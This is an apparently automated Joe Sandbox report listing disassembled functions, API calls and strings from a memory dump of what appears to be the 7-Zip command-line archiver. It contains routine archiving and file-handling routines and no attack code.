
Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
Instruction ID: 8925184d71202570b625feeffac205bc40e225ebce9f8a3162c09dbcfa6d2959
Opcode Fuzzy Hash: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
Instruction Fuzzy Hash: D111FA2330398485CA11AF35D86176A2360EB87FA9F1892F1DF6D677A9CE24C84AC714

Function 00B794A8 Relevance: 8.8, APIs: 7, Instructions: 53COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B794DB
free.MSVCRT ref: 00B794E3
free.MSVCRT ref: 00B794F0
free.MSVCRT ref: 00B7951C
free.MSVCRT ref: 00B79525
free.MSVCRT ref: 00B7952D
free.MSVCRT ref: 00B7953A

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
Instruction ID: 1e8845cc6e0ac6a029075bd0baf4adbbe732d2f922b26c9afbc626f196eea841
Opcode Fuzzy Hash: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
Instruction Fuzzy Hash: BF01A523703D90898B21EF36DC512696361EB96FE971942E5DF3D2B359DE20CC428740

Function 00B8ECDC Relevance: 8.8, APIs: 7, Instructions: 53COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B8ED0F
free.MSVCRT ref: 00B8ED1C
free.MSVCRT ref: 00B8ED29
free.MSVCRT ref: 00B8ED59
free.MSVCRT ref: 00B8ED61
free.MSVCRT ref: 00B8ED6E
free.MSVCRT ref: 00B8ED78

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
Instruction ID: 3a66e18a3d9977e4c8224590acd29f5403784a36c85a7c718b053e0e89a88d8e
Opcode Fuzzy Hash: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
Instruction Fuzzy Hash: 45111E23743D4085CA20AF35D85176E2390EB87FA5F1842F1AF6D6B7A9CF20C84AC750

Function 00B96B3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B96B7C

Part of subcall function 00B56618: FormatMessageW.KERNEL32 ref: 00B56676
Part of subcall function 00B56618: LocalFree.KERNEL32 ref: 00B56698

Part of subcall function 00B52320: free.MSVCRT ref: 00B5237E
Part of subcall function 00B52320: fputs.MSVCRT ref: 00B523B8
Part of subcall function 00B52320: free.MSVCRT ref: 00B523C4

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

free.MSVCRT ref: 00B96BAE
fputs.MSVCRT ref: 00B96BCC

Strings

: , xrefs: 00B96B75
----------------, xrefs: 00B96BC5

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputsfree$FormatFreeLocalMessagefputc
String ID: : $----------------
API String ID: 1215563195-4071417161
Opcode ID: a1891ed469a183347d2f6cf8ed5e79c02ed55b8146c20c8c025d0fedb9797568
Instruction ID: d9ce2f3aa7ee23e62fc34d00c1b131a0c5f2744454f75e54c61f88014ded58be
Opcode Fuzzy Hash: a1891ed469a183347d2f6cf8ed5e79c02ed55b8146c20c8c025d0fedb9797568
Instruction Fuzzy Hash: BC01A16230190595DA20EF26E88072E3320F785BE5F0882A5EF6E433A4DF3CC44AC700

Function 00B9430C Relevance: 8.8, APIs: 7, Instructions: 40COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B9431C
free.MSVCRT ref: 00B94325
free.MSVCRT ref: 00B9432E
free.MSVCRT ref: 00B94337
free.MSVCRT ref: 00B94362
free.MSVCRT ref: 00B9436B
free.MSVCRT ref: 00B94373

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
Instruction ID: 9b4739ba75970c4cc161b6a7a7e681904f8e41c91d2584255e54aadfebbaa97d
Opcode Fuzzy Hash: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
Instruction Fuzzy Hash: E3F01923B13C5089CA11AF36DC9166D23A0EB87FE671942F1AF1D6B369CF20C8478784

Function 00B9BCA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B9BCD4

Part of subcall function 00B52320: free.MSVCRT ref: 00B5237E
Part of subcall function 00B52320: fputs.MSVCRT ref: 00B523B8
Part of subcall function 00B52320: free.MSVCRT ref: 00B523C4

fputs.MSVCRT ref: 00B9BD17

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

free.MSVCRT ref: 00B9BD2B

Strings

: , xrefs: 00B9BCE9
Write SFX: , xrefs: 00B9BCCD

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputsfree$fputc
String ID: : $Write SFX:
API String ID: 3584323934-2530961540
Opcode ID: 2aff07aef23fae9920ced389d97e2e1f62bb88a79c222afd3b495df10a0729ce
Instruction ID: 526afda49a2e3100fc6bc76ba3662554a73c9cedc718b52ae6d36170f6311b8e
Opcode Fuzzy Hash: 2aff07aef23fae9920ced389d97e2e1f62bb88a79c222afd3b495df10a0729ce
Instruction Fuzzy Hash: A30167A230594191DE20EF25E85435E6361EB85FF5F48D3B1AE2E477A9DF2CC98AC700

Function 00B9BB18 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B9BB49
fputs.MSVCRT ref: 00B9BB76

Part of subcall function 00B52568: free.MSVCRT ref: 00B525B5
Part of subcall function 00B52568: free.MSVCRT ref: 00B525C0

Strings

Updating archive: , xrefs: 00B9BB34
StdOut, xrefs: 00B9BB6C
Creating archive: , xrefs: 00B9BB3E

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputsfree
String ID: Creating archive: $StdOut$Updating archive:
API String ID: 2581285248-1319951512
Opcode ID: 5f5adb3b3a84b5c65e0bca1f05b3611791ef6013b907f1f29a1bbb4614530b65
Instruction ID: 04a71e3a439d09582ad99684f82a4a32532ba5893a3b94b8078fe3374fa874e5
Opcode Fuzzy Hash: 5f5adb3b3a84b5c65e0bca1f05b3611791ef6013b907f1f29a1bbb4614530b65
Instruction Fuzzy Hash: 33F062A5305A45D1DE05DF2AEA9436C3361EB45FE5F48D4728E0E4B769EF2CC489C300

Function 00B5ECDC Relevance: 8.8, APIs: 7, Instructions: 21COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B5ECE9
free.MSVCRT ref: 00B5ECF2
free.MSVCRT ref: 00B5ECFB
free.MSVCRT ref: 00B5ED04
free.MSVCRT ref: 00B5ED0D
free.MSVCRT ref: 00B5ED16
free.MSVCRT ref: 00B5ED1F

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
Instruction ID: aabac03b6ed7e8f26e752cf4232c36302cea6459e55d61656b15474e8ad69912
Opcode Fuzzy Hash: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
Instruction Fuzzy Hash: 88E0DC13713C0481DB14FF76DC9122D23A4E7D7F4571410D19F2D5B325CD10C8568B84

Function 00B63F0C Relevance: 7.7, APIs: 6, Instructions: 191COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B63F5A
free.MSVCRT ref: 00B63F62
free.MSVCRT ref: 00B63FC0
free.MSVCRT ref: 00B63FC8
free.MSVCRT ref: 00B64007
free.MSVCRT ref: 00B6400F

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
Instruction ID: fb3fdae8b899e72dced779120df5f90b41e18ed76754c004acf12d1fe454ba80
Opcode Fuzzy Hash: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
Instruction Fuzzy Hash: 1D814873305AC085CB14EF2AD8802AD77A1F786F98F4841A2DE5D1B769CF39C886C311

Function 00B7E954 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

Q, xrefs: 00B7E9E8

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID:
String ID: Q
API String ID: 0-3463352047
Opcode ID: 708d1e99ea4dbab6444f2f0d64f520fcdf94141e7dceb2e288505dbe970de39d
Instruction ID: 84e3b7735efdbfc16644c41a41fcf4e82cf3826790f7be0ed1b655ceb01aebf0
Opcode Fuzzy Hash: 708d1e99ea4dbab6444f2f0d64f520fcdf94141e7dceb2e288505dbe970de39d
Instruction Fuzzy Hash: 14616462319A8082CB20DF25E4C066EB7A1FBC9B94F549191EFBE57768DF78C845CB00

Function 00B688EC Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 138COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B68930

Strings

page:, xrefs: 00B68A30
gran:, xrefs: 00B68A7B
cpus:, xrefs: 00B68A0D
act:, xrefs: 00B689E3

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID: act:$ cpus:$ gran:$ page:
API String ID: 1294909896-454015223
Opcode ID: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
Instruction ID: a1d843f5a4cd82b5f2f28eabc2c3b597e2ea7c12306c1b5f40b1d7b2f84a4213
Opcode Fuzzy Hash: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
Instruction Fuzzy Hash: 3C51C86934160151DE28EB15E9513A823F1EB8A7D1F4492B2DF1A07B98DF7CC559C740

Function 00B60160 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 123COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B601D7
_CxxThrowException.MSVCRT ref: 00B602EA

Part of subcall function 00B5FD30: _CxxThrowException.MSVCRT ref: 00B5FE50

_CxxThrowException.MSVCRT ref: 00B6031F

Strings

There is no second file name for rename pair:, xrefs: 00B60302
Empty file path, xrefs: 00B602CD

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ExceptionThrow$free
String ID: Empty file path$There is no second file name for rename pair:
API String ID: 3129652135-1725603831
Opcode ID: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
Instruction ID: 19cf8eb63db5cb40a8ebe0aec2e82fd2713ec8add1b543f8f2846dad630c06ef
Opcode Fuzzy Hash: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
Instruction Fuzzy Hash: 4241C262214684C1CA30EB1AE89075B7BA0F3567B4F504392EFB9177D9DB3DC589CB40

Function 00B703BC Relevance: 7.6, APIs: 5, Instructions: 108COMMON

Download Yara Rule

APIs

GetFileSecurityW.ADVAPI32 ref: 00B70415
GetLastError.KERNEL32 ref: 00B70448

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ErrorFileLastSecurity
String ID:
API String ID: 555121230-0
Opcode ID: dbe237cfadc90cb09746e3018bc91a680bb73bee37176d8e7191999cda9ad572
Instruction ID: 67b1929509fd1daec7b47cf649002ddace969bb7d75ffb9529ffba7235da8897
Opcode Fuzzy Hash: dbe237cfadc90cb09746e3018bc91a680bb73bee37176d8e7191999cda9ad572
Instruction Fuzzy Hash: 50418E33211A90D6C720EF25E8507A973A6F385B98F598172DF6E9B714DF30C886C751

Function 00B8E580 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B8E5C5
free.MSVCRT ref: 00B8E669

Strings

#, xrefs: 00B8E677

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID: #
API String ID: 1294909896-1885708031
Opcode ID: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
Instruction ID: 504b5463a5d15445fd03bebe03476c16dc779dc8cb43e18fb0551075fc5c3d3b
Opcode Fuzzy Hash: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
Instruction Fuzzy Hash: 9131A323304A9081CB20EF15D98055EA7E4F7D57E4F6402A1FEAE5B774DE38C886CB00

Function 00B53CBC Relevance: 7.6, APIs: 5, Instructions: 94COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00B53E32), ref: 00B53D18
GetLastError.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00B53E32), ref: 00B53D25
_CxxThrowException.MSVCRT ref: 00B53D4E
WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00B53E32), ref: 00B53DC1
_CxxThrowException.MSVCRT ref: 00B53DFA

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ByteCharExceptionMultiThrowWide$ErrorLast
String ID:
API String ID: 2296236218-0
Opcode ID: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
Instruction ID: 004b0df0fc04aea5e6cb98343384e0a47e27140eeeb937b7d17e8a5efb9e7ce4
Opcode Fuzzy Hash: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
Instruction Fuzzy Hash: 1231FC72704AC18ACB20CF25E48036EBBF5F788B94F548061DF8963B20DB38C886C751

Function 00B97080 Relevance: 7.6, APIs: 6, Instructions: 77COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B970EC
free.MSVCRT ref: 00B970F4
free.MSVCRT ref: 00B97101
free.MSVCRT ref: 00B9712E
free.MSVCRT ref: 00B97136
free.MSVCRT ref: 00B97143

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
Instruction ID: d7dc35fa3ae7b201010054a2d403b5984a10e31ca9c16881d952a572c2f4173c
Opcode Fuzzy Hash: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
Instruction Fuzzy Hash: FB213B67752E4086CF25DF36D85072963A0EB86FA9F2942A1DF2D27798DF35C806C350

Function 00B56778 Relevance: 7.6, APIs: 5, Instructions: 74filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00B567D5
CreateFileW.KERNEL32 ref: 00B56831
free.MSVCRT ref: 00B5683F
SetFileTime.KERNEL32 ref: 00B56856
CloseHandle.KERNEL32 ref: 00B56864

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: File$Create$CloseHandleTimefree
String ID:
API String ID: 234454789-0
Opcode ID: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
Instruction ID: 3144be475387897c3d68ae26381de654b38c1ff5a197bbf3f4aeeb0426b3b6f9
Opcode Fuzzy Hash: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
Instruction Fuzzy Hash: EC21D43230059086D6209F26F954B6A7761F386BF9F5403A1EF7543BE8CB38C98EC640

Function 00B7BF88 Relevance: 7.6, APIs: 6, Instructions: 70COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00B7BFB3
memcmp.MSVCRT ref: 00B7BFD1
memcmp.MSVCRT ref: 00B7BFE7

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
Instruction ID: 060c78ea6709d17f33ed46c977c3c6ec17a7dd338ffb01f13fdaa20776019f88
Opcode Fuzzy Hash: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
Instruction Fuzzy Hash: 8E11DFA130575091EF04DF269D923A927A1DB0AFC0F8884A8CE1A9B205EF78CA46C342

Function 00B78290 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00B5B544: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,Path64,00B782CA), ref: 00B5B56F

Part of subcall function 00B5B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 00B5B4AA
Part of subcall function 00B5B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 00B5B4F8

free.MSVCRT ref: 00B78343

Part of subcall function 00B53404: free.MSVCRT ref: 00B53431
Part of subcall function 00B53404: memmove.MSVCRT ref: 00B5344C

Part of subcall function 00B58624: free.MSVCRT ref: 00B586A9

free.MSVCRT ref: 00B7832B
free.MSVCRT ref: 00B78336

Strings

Software\7-zip, xrefs: 00B782B7
7z.dll, xrefs: 00B78307

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$QueryValue$Openmemmove
String ID: 7z.dll$Software\7-zip
API String ID: 2771487249-1558686312
Opcode ID: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
Instruction ID: 5a1a98d3ca060f9c3a9adf1127a5af4f553540fa4c820f6818b28342da12ac2b
Opcode Fuzzy Hash: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
Instruction Fuzzy Hash: 7111CA52345D4050CA20EB21E5553EE63A0EBD6BE1F8452D1BD5D577A6DF28C64ECB00

Function 00B9225C Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

